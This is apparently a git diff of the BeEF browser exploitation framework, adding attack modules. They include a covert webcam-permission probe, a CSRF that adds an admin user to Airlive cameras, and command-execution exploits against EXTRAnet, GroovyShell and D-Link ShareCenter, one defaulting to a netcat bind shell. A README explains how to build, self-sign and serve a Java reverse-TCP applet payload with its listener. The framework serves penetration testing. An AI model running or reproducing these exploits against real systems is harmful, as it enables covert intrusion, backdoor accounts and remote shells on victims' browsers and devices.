var swfobjectCallback = function(e) {
|
||||
if(e.success){
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
|
||||
} else {
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
//This is the DIV for the flash object
|
||||
|
||||
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
|
||||
$j('body').append(body_flash_container);
|
||||
|
||||
// Lets execute swfobject.js
|
||||
// If it works, we then run it to embed the swf file into the above div
|
||||
$j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
|
||||
var flashvars = {};
|
||||
var parameters = {};
|
||||
parameters.scale = "noscale";
|
||||
parameters.wmode = "opaque";
|
||||
parameters.allowFullScreen = "true";
|
||||
parameters.allowScriptAccess = "always";
|
||||
var attributes = {};
|
||||
swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
|
||||
});
|
||||
|
||||
//A library that helps include the swf file
|
||||
//var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
|
||||
|
||||
//This is the javascript that actually calls the swfobject library to include the swf file
|
||||
//var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
|
||||
|
||||
|
||||
//Add flash content
|
||||
//$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
|
||||
|
||||
});
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
15
modules/browser/webcam_permission_check/config.yaml
Normal file
15
modules/browser/webcam_permission_check/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
webcam_permission_check:
|
||||
enable: true
|
||||
category: "Browser"
|
||||
name: "Webcam Permission Check"
|
||||
description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
|
||||
authors: ["@bw_z"]
|
||||
target:
|
||||
working: ["All"]
|
||||
19
modules/browser/webcam_permission_check/module.rb
Normal file
19
modules/browser/webcam_permission_check/module.rb
Normal file
@@ -0,0 +1,19 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
|
||||
class Webcam_permission_check < BeEF::Core::Command
|
||||
def pre_send
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
|
||||
end
|
||||
|
||||
def post_execute
|
||||
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
|
||||
end
|
||||
|
||||
end
|
||||
4
modules/browser/webcam_permission_check/swfobject.js
Normal file
4
modules/browser/webcam_permission_check/swfobject.js
Normal file
File diff suppressed because one or more lines are too long
17
modules/debug/test_beef_debug/command.js
Normal file
17
modules/debug/test_beef_debug/command.js
Normal file
@@ -0,0 +1,17 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
try {
|
||||
var msg = "<%= @msg.gsub(/"/, '\\"') %>";
|
||||
beef.debug(msg);
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
|
||||
} catch(e) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
|
||||
}
|
||||
|
||||
});
|
||||
16
modules/debug/test_beef_debug/config.yaml
Normal file
16
modules/debug/test_beef_debug/config.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
test_beef_debug:
|
||||
enable: true
|
||||
category: "Debug"
|
||||
name: "Test beef.debug()"
|
||||
description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["All"]
|
||||
not_working: ["IE"]
|
||||
20
modules/debug/test_beef_debug/module.rb
Normal file
20
modules/debug/test_beef_debug/module.rb
Normal file
@@ -0,0 +1,20 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Test_beef_debug < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content['Result'] = @datastore['result']
|
||||
save content
|
||||
end
|
||||
|
||||
end
|
||||
12
modules/debug/test_return_image/command.js
Normal file
12
modules/debug/test_return_image/command.js
Normal file
File diff suppressed because one or more lines are too long
15
modules/debug/test_return_image/config.yaml
Normal file
15
modules/debug/test_return_image/config.yaml
Normal file
@@ -0,0 +1,15 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
test_return_image:
|
||||
enable: true
|
||||
category: "Debug"
|
||||
name: "Return Image"
|
||||
description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["ALL"]
|
||||
14
modules/debug/test_return_image/module.rb
Normal file
14
modules/debug/test_return_image/module.rb
Normal file
@@ -0,0 +1,14 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Test_return_image < BeEF::Core::Command
|
||||
|
||||
def post_execute
|
||||
content = {}
|
||||
content['image'] = @datastore['image']
|
||||
save content
|
||||
end
|
||||
|
||||
end
|
||||
@@ -9,6 +9,7 @@ beef.execute(function () {
|
||||
var rport = '<%= @rport %>';
|
||||
var path = '<%= @path %>';
|
||||
var cmd = '<%= @cmd %>';
|
||||
var shellcode ='<%= @shellcode %>';
|
||||
|
||||
var uri = "http://" + rhost + ":" + rport + path;
|
||||
|
||||
@@ -31,15 +32,15 @@ beef.execute(function () {
|
||||
xhr.onreadystatechange = function(){
|
||||
if(xhr.readyState == 4){
|
||||
var result = strip_output(xhr.responseText);
|
||||
console.log("result.length: " + result.length);
|
||||
beef.debug("result.length: " + result.length);
|
||||
if(result.length != 0){
|
||||
console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
|
||||
beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
|
||||
counter++;
|
||||
setTimeout("get_additional_cmd_results()",500);
|
||||
}
|
||||
}else{ // No more command results, ready to send another command.
|
||||
console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
|
||||
beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
|
||||
}
|
||||
};
|
||||
xhr.open("GET", uri, false);
|
||||
@@ -51,9 +52,9 @@ beef.execute(function () {
|
||||
xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function(){
|
||||
if(xhr.readyState == 4){
|
||||
console.log("get_prompt: Retrieved prompt");
|
||||
beef.debug("get_prompt: Retrieved prompt");
|
||||
var prompt = strip_output(xhr.responseText);
|
||||
console.log(prompt);
|
||||
beef.debug(prompt);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
|
||||
|
||||
//send command
|
||||
@@ -68,12 +69,16 @@ beef.execute(function () {
|
||||
xhr = new XMLHttpRequest();
|
||||
xhr.onreadystatechange = function(){
|
||||
var cmd_result = strip_output(xhr.responseText);
|
||||
console.log(cmd_result);
|
||||
beef.debug(cmd_result);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
|
||||
};
|
||||
xhr.open("POST", uri, false);
|
||||
xhr.setRequestHeader("Content-Type", "text/plain");
|
||||
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
|
||||
if (shellcode == 'Linux'){
|
||||
command = "cmd=" + command + "\n"; // very important only LF
|
||||
}else{
|
||||
command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
|
||||
}
|
||||
xhr.send(command);
|
||||
setTimeout("get_additional_cmd_results()",500);
|
||||
};
|
||||
|
||||
@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
|
||||
{ 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
|
||||
{ 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
|
||||
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
|
||||
{ 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
|
||||
{ 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
|
||||
'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
|
||||
'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
|
||||
}
|
||||
]
|
||||
end
|
||||
|
||||
|
||||
@@ -295,7 +295,7 @@ beef.execute(function () {
|
||||
|
||||
// this is required only with WebKit browsers.
|
||||
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
|
||||
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
|
||||
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
|
||||
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
|
||||
function byteValue(x) {
|
||||
return x.charCodeAt(0) & 0xff;
|
||||
@@ -310,7 +310,7 @@ beef.execute(function () {
|
||||
log("send_stager: stager sent.");
|
||||
stager_successfull = true;
|
||||
}catch(exception){
|
||||
console.log("!!! Exception: " + exception);
|
||||
beef.debug("!!! Exception: " + exception);
|
||||
// Check for PortBanning exceptions:
|
||||
//NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
|
||||
if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
|
||||
@@ -335,13 +335,13 @@ beef.execute(function () {
|
||||
var uri = "http://" + rhost + ":" + rport + path;
|
||||
|
||||
xhr = new XMLHttpRequest();
|
||||
console.log("uri: " + uri);
|
||||
beef.debug("uri: " + uri);
|
||||
xhr.open("POST", uri, true);
|
||||
xhr.setRequestHeader("Content-Type", "text/plain");
|
||||
|
||||
// this is required only with WebKit browsers.
|
||||
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
|
||||
console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
|
||||
beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
|
||||
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
|
||||
function byteValue(x) {
|
||||
return x.charCodeAt(0) & 0xff;
|
||||
@@ -362,7 +362,7 @@ beef.execute(function () {
|
||||
|
||||
log = function(data){
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
|
||||
console.log(data);
|
||||
beef.debug(data);
|
||||
};
|
||||
|
||||
|
||||
|
||||
30
modules/exploits/camera/airlive_ip_camera_csrf/command.js
Normal file
30
modules/exploits/camera/airlive_ip_camera_csrf/command.js
Normal file
@@ -0,0 +1,30 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
var base = '<%= @base %>';
|
||||
var path = 'cgi-bin/admin/usrgrp.cgi';
|
||||
var user = '<%= @user %>';
|
||||
var pass = '<%= @pass %>';
|
||||
|
||||
var airlive_ip_camera_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(base + path, "GET",
|
||||
[{'type':'hidden', 'name':'user', 'value':user},
|
||||
{'type':'hidden', 'name':'pwd', 'value':pass},
|
||||
{'type':'hidden', 'name':'grp', 'value':'administrator'},
|
||||
{'type':'hidden', 'name':'sgrp', 'value':'ptz'},
|
||||
{'type':'hidden', 'name':'action', 'value':'add'},
|
||||
{'type':'hidden', 'name':'redirect', 'value':''}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(airlive_ip_camera_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", 15000);
|
||||
|
||||
});
|
||||
|
||||
18
modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
Normal file
18
modules/exploits/camera/airlive_ip_camera_csrf/config.yaml
Normal file
@@ -0,0 +1,18 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
# For more information see:
|
||||
# http://www.exploit-db.com/exploits/26174/
|
||||
##
|
||||
beef:
|
||||
module:
|
||||
airlive_add_user_csrf:
|
||||
enable: true
|
||||
category: ["Exploits", "Camera"]
|
||||
name: "Airlive Add User CSRF"
|
||||
description: "Attempts to add an admin user on a Airlive camera.<br/><br/>This CSRF is reported to work on the following models: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.</br/><br/>Note: This module has not been tested on a real device."
|
||||
authors: ["bcoles", "Eliezer Varadé Lopez", "Javier Repiso Sánchez", "Jonás Ropero Castillo"]
|
||||
target:
|
||||
unknown: ["ALL"]
|
||||
20
modules/exploits/camera/airlive_ip_camera_csrf/module.rb
Normal file
20
modules/exploits/camera/airlive_ip_camera_csrf/module.rb
Normal file
@@ -0,0 +1,20 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Airlive_add_user_csrf < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
|
||||
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
|
||||
{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']})
|
||||
end
|
||||
|
||||
end
|
||||
43
modules/exploits/extract_cmd_exec/command.js
Normal file
43
modules/exploits/extract_cmd_exec/command.js
Normal file
@@ -0,0 +1,43 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var timeout = '<%= @timeout %>';
|
||||
|
||||
// validate payload
|
||||
try {
|
||||
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
|
||||
var payload = 'createuser '+cmd+'&>/dev/null; echo;\r\nquit\r\n';
|
||||
} catch(e) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
|
||||
return;
|
||||
}
|
||||
|
||||
// validate target details
|
||||
if (!rport || !rhost || isNaN(rport)) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
|
||||
return;
|
||||
}
|
||||
if (rport > 65535 || rport < 0) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
|
||||
return;
|
||||
}
|
||||
|
||||
// send commands
|
||||
var extract_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
|
||||
|
||||
// clean up
|
||||
cleanup = function() {
|
||||
document.body.removeChild(extract_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
16
modules/exploits/extract_cmd_exec/config.yaml
Normal file
16
modules/exploits/extract_cmd_exec/config.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
extract_cmd_exec:
|
||||
enable: true
|
||||
category: "Exploits"
|
||||
name: "EXTRAnet Collaboration Tool (extra-ct) Command Execution"
|
||||
description: "This module exploits a command execution vulnerability in the 'admserver' component of the EXTRAnet Collaboration Tool (default port 10100) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["FF", "C"]
|
||||
not_working: ["IE"]
|
||||
30
modules/exploits/extract_cmd_exec/module.rb
Normal file
30
modules/exploits/extract_cmd_exec/module.rb
Normal file
@@ -0,0 +1,30 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
###
|
||||
# Reference: http://itsecuritysolutions.org/2011-12-16-Privilege-escalation-and-remote-inter-protocol-exploitation-with-EXTRACT-0.5.1/
|
||||
###
|
||||
# EXTRAnet Collaboration Tool (extra-ct)
|
||||
# Version: 0.5.1
|
||||
# Homepage: http://www.extra-ct.net/
|
||||
# Source: http://code.google.com/p/extra-ct/
|
||||
# Source: http://sourceforge.net/projects/extract/
|
||||
###
|
||||
class Extract_cmd_exec < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
|
||||
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
|
||||
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
|
||||
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
|
||||
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
|
||||
end
|
||||
|
||||
end
|
||||
43
modules/exploits/groovyshell_server_cmd_exec/command.js
Normal file
43
modules/exploits/groovyshell_server_cmd_exec/command.js
Normal file
@@ -0,0 +1,43 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var rhost = '<%= @rhost %>';
|
||||
var rport = '<%= @rport %>';
|
||||
var timeout = '<%= @timeout %>';
|
||||
|
||||
// validate payload
|
||||
try {
|
||||
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
|
||||
var payload = '\r\ndiscard\r\nprintln \''+cmd+'\'.execute().text\r\ngo\r\nexit\r\n'
|
||||
} catch(e) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
|
||||
return;
|
||||
}
|
||||
|
||||
// validate target details
|
||||
if (!rport || !rhost || isNaN(rport)) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');
|
||||
return;
|
||||
}
|
||||
if (rport > 65535 || rport < 0) {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');
|
||||
return;
|
||||
}
|
||||
|
||||
// send commands
|
||||
var groovy_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=sent commands");
|
||||
|
||||
// clean up
|
||||
cleanup = function() {
|
||||
document.body.removeChild(groovy_iframe_<%= @command_id %>);
|
||||
}
|
||||
setTimeout("cleanup()", timeout*1000);
|
||||
|
||||
});
|
||||
|
||||
16
modules/exploits/groovyshell_server_cmd_exec/config.yaml
Normal file
16
modules/exploits/groovyshell_server_cmd_exec/config.yaml
Normal file
@@ -0,0 +1,16 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
beef:
|
||||
module:
|
||||
groovyshell_server_command_execution:
|
||||
enable: true
|
||||
category: "Exploits"
|
||||
name: "GroovyShell Server Command Execution"
|
||||
description: "This module uses the GroovyShell Server interface (default port 6789) to execute operating system commands.<br /><br />The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: Spaces in the command are not supported."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["FF", "C"]
|
||||
not_working: ["IE"]
|
||||
22
modules/exploits/groovyshell_server_cmd_exec/module.rb
Normal file
22
modules/exploits/groovyshell_server_cmd_exec/module.rb
Normal file
@@ -0,0 +1,22 @@
|
||||
#
|
||||
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
# Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
# See the file 'doc/COPYING' for copying permission
|
||||
#
|
||||
class Groovyshell_server_command_execution < BeEF::Core::Command
|
||||
|
||||
def self.options
|
||||
return [
|
||||
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
|
||||
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
|
||||
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
|
||||
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
|
||||
]
|
||||
end
|
||||
|
||||
def post_execute
|
||||
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
|
||||
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
|
||||
end
|
||||
|
||||
end
|
||||
Binary file not shown.
Binary file not shown.
BIN
modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
Normal file
BIN
modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar
Normal file
Binary file not shown.
50
modules/exploits/local_host/java_payload/README.txt
Normal file
50
modules/exploits/local_host/java_payload/README.txt
Normal file
@@ -0,0 +1,50 @@
|
||||
--- How to use this module ---
|
||||
The following is how you compile the JavaPayload handlers :
|
||||
|
||||
$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
|
||||
$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
|
||||
$cd .. && ant compile && ant jar
|
||||
$cd build/bin
|
||||
$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP
|
||||
|
||||
At this point you have the applet ready to go, with a reverseTCP handler:
|
||||
Applet_ReverseTCP.jar
|
||||
Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
|
||||
with Java 6 to run it on those versions too - SUGGESTED :-).
|
||||
|
||||
At this stage you need to sign the applet.
|
||||
The following is to create a self-signed certificate and then sign it.
|
||||
Obviously if you have a valid code signing certificate, even better ;)
|
||||
|
||||
keytool -keystore tmp -genkey
|
||||
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
|
||||
|
||||
Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
|
||||
|
||||
You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
|
||||
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
|
||||
|
||||
Now launch the BeEF module.
|
||||
If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
|
||||
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
|
||||
! help
|
||||
help: show information about commands.
|
||||
Usage: help [command]
|
||||
|
||||
Supported commands:
|
||||
help - show this help
|
||||
info - list system properties
|
||||
pwd - show current directory
|
||||
cd - change directory
|
||||
ls - list directory
|
||||
exec - execute native command
|
||||
cat - show text file
|
||||
wget - download file
|
||||
telnet - create TCP connection
|
||||
paste - create text file
|
||||
jobs - list or continue jobs
|
||||
exit - Exit JSh
|
||||
|
||||
When inside an interactive command, enter ~. on a new
|
||||
line to exit from that command. Enter ~& to background the command.
|
||||
Enter ~~ to start a line with a ~ character
|
||||
@@ -12,5 +12,4 @@ beef:
|
||||
description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh<br /><br />Windows Vista is not supported."
|
||||
authors: ["antisnatchor"]
|
||||
target:
|
||||
not_working: ["FF"]
|
||||
user_notify: ["All"]
|
||||
|
||||
@@ -6,7 +6,7 @@
|
||||
class Java_payload < BeEF::Core::Command
|
||||
|
||||
def pre_send
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
|
||||
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
|
||||
end
|
||||
|
||||
def self.options
|
||||
|
||||
27
modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
Normal file
27
modules/exploits/nas/dlink_sharecenter_cmd_exec/command.js
Normal file
@@ -0,0 +1,27 @@
|
||||
//
|
||||
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
||||
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
||||
// See the file 'doc/COPYING' for copying permission
|
||||
//
|
||||
|
||||
beef.execute(function() {
|
||||
|
||||
var gateway = '<%= @base %>';
|
||||
var path = '/cgi-bin/system_mgr.cgi';
|
||||
var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
|
||||
var timeout = 15;
|
||||
|
||||
var dlink_sharecenter_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
|
||||
{'type':'hidden', 'name':'cmd', 'value':'cgi_sms_test'},
|
||||
{'type':'hidden', 'name':'command1', 'value':cmd}
|
||||
]);
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
|
||||
|
||||
cleanup = function() {
|
||||
document.body.removeChild(dlink_sharecenter_iframe_<%= @command_id %>);
|
||||
}
|
||||
